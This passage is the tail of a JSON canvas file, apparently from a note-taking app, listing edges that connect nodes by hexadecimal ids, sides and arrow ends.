		{"id":"e0f75221d305fc3d","fromNode":"3426c0f056b4fb79","fromSide":"right","toNode":"2c89651329f2cc32","toSide":"left","toEnd":"none"},
		{"id":"35feb1cfea9f3944","fromNode":"142418ca45d31848","fromSide":"top","toNode":"a373b44c49f13385","toSide":"right","fromEnd":"arrow"},
		{"id":"2e9b75c22621e2ae","fromNode":"e828ec4a991ed488","fromSide":"right","toNode":"e817f8d05ec13e2b","toSide":"left","toEnd":"none"},
		{"id":"d3bc4b5ff794456a","fromNode":"142418ca45d31848","fromSide":"bottom","toNode":"8f66005a5729f470","toSide":"right"},
		{"id":"536fcee4fe3f5a7c","fromNode":"8f66005a5729f470","fromSide":"left","toNode":"e817f8d05ec13e2b","toSide":"bottom"},
		{"id":"fbee1671c7da2e8f","fromNode":"a053b513fd408255","fromSide":"right","toNode":"0739720af7ac32a1","toSide":"bottom","fromEnd":"arrow"},
		{"id":"9eb2cf632b52b042","fromNode":"14dbf9ce7e2d7606","fromSide":"right","toNode":"55dc5a550a18d09d","toSide":"left","toEnd":"none"},
		{"id":"03fa5515fe94840f","fromNode":"0d32a9cebce85df9","fromSide":"left","toNode":"55dc5a550a18d09d","toSide":"right"},
		{"id":"0c2adbf634f7c122","fromNode":"16f6d9e5298883f1","fromSide":"left","toNode":"51d920476a8d5baf","toSide":"right"},
		{"id":"357a1c4712dac8f6","fromNode":"fa5b47ed043a1357","fromSide":"left","toNode":"10b21ecd543aae45","toSide":"right"},
		{"id":"b5bd6085aaf6afec","fromNode":"14dbf9ce7e2d7606","fromSide":"right","toNode":"f15b9157baf1af18","toSide":"left","toEnd":"none"},
		{"id":"f2f54787456ccebf","fromNode":"f15b9157baf1af18","fromSide":"right","toNode":"0d32a9cebce85df9","toSide":"bottom","fromEnd":"arrow"},
		{"id":"3d112136e4e23ddb","fromNode":"51d920476a8d5baf","fromSide":"bottom","toNode":"01651eca08353a03","toSide":"left","fromEnd":"arrow"},
		{"id":"a21491492a8b7078","fromNode":"01651eca08353a03","fromSide":"right","toNode":"34cac204324cf8af","toSide":"left","toEnd":"none"},
		{"id":"92799f9e0e9fbf95","fromNode":"16f6d9e5298883f1","fromSide":"right","toNode":"34cac204324cf8af","toSide":"left","toEnd":"none"},
		{"id":"0f47bd11c7e35cf7","fromNode":"8bcfbfc8858bc786","fromSide":"left","toNode":"10b21ecd543aae45","toSide":"bottom","fromEnd":"arrow"},
		{"id":"393f94313c683fde","fromNode":"8bcfbfc8858bc786","fromSide":"right","toNode":"4bc3b4900d4dce02","toSide":"left","toEnd":"none"},
		{"id":"9a420657e1088a24","fromNode":"fa5b47ed043a1357","fromSide":"right","toNode":"4bc3b4900d4dce02","toSide":"left","toEnd":"none"},
		{"id":"4bbda8548091a2ce","fromNode":"51d920476a8d5baf","fromSide":"top","toNode":"7bfba86404f03eb9","toSide":"left"},
		{"id":"2e8f1d6b16d6313a","fromNode":"7bfba86404f03eb9","fromSide":"right","toNode":"34cac204324cf8af","toSide":"left","toEnd":"none"},
		{"id":"99505297ef7df71d","fromNode":"afaa0e6451d059ce","fromSide":"right","toNode":"0d32a9cebce85df9","toSide":"top"},
		{"id":"84602d77994662f7","fromNode":"afaa0e6451d059ce","fromSide":"left","toNode":"14dbf9ce7e2d7606","toSide":"right","toEnd":"none"},
		{"id":"06e8d0697cdc7169","fromNode":"10b21ecd543aae45","fromSide":"top","toNode":"e0366ff4d7ee3def","toSide":"left"},
		{"id":"51fb57907fd0132b","fromNode":"8f0864458b6db583","fromSide":"right","toNode":"16fde3bfe02bb274","toSide":"left"},
		{"id":"1ef60ac428ecffa0","fromNode":"8b2067f7b664e836","fromSide":"left","toNode":"12751d8da40086d8","toSide":"top"},
		{"id":"a1bdf7f73a33479d","fromNode":"2c89651329f2cc32","fromSide":"left","toNode":"8b2067f7b664e836","toSide":"right","toEnd":"none"},
		{"id":"3a9b3b555b5fb5c7","fromNode":"d1d0387d954bb389","fromSide":"right","toNode":"5847cd09d10f77cd","toSide":"left","fromEnd":"arrow"},
		{"id":"2ee3045697b39546","fromNode":"5f3831775737b9b8","fromSide":"right","toNode":"5847cd09d10f77cd","toSide":"left","fromEnd":"arrow"},
		{"id":"fb57b9de7e1ed7e4","fromNode":"8109b9a37fc30496","fromSide":"bottom","toNode":"e3b260a454918604","toSide":"right"},
		{"id":"456ec93cc7efa3f3","fromNode":"e3b260a454918604","fromSide":"left","toNode":"a5b81207f2148c47","toSide":"right"},
		{"id":"0c722f3678a27c94","fromNode":"e3b260a454918604","fromSide":"left","toNode":"796586347d87b926","toSide":"right"}
	]
}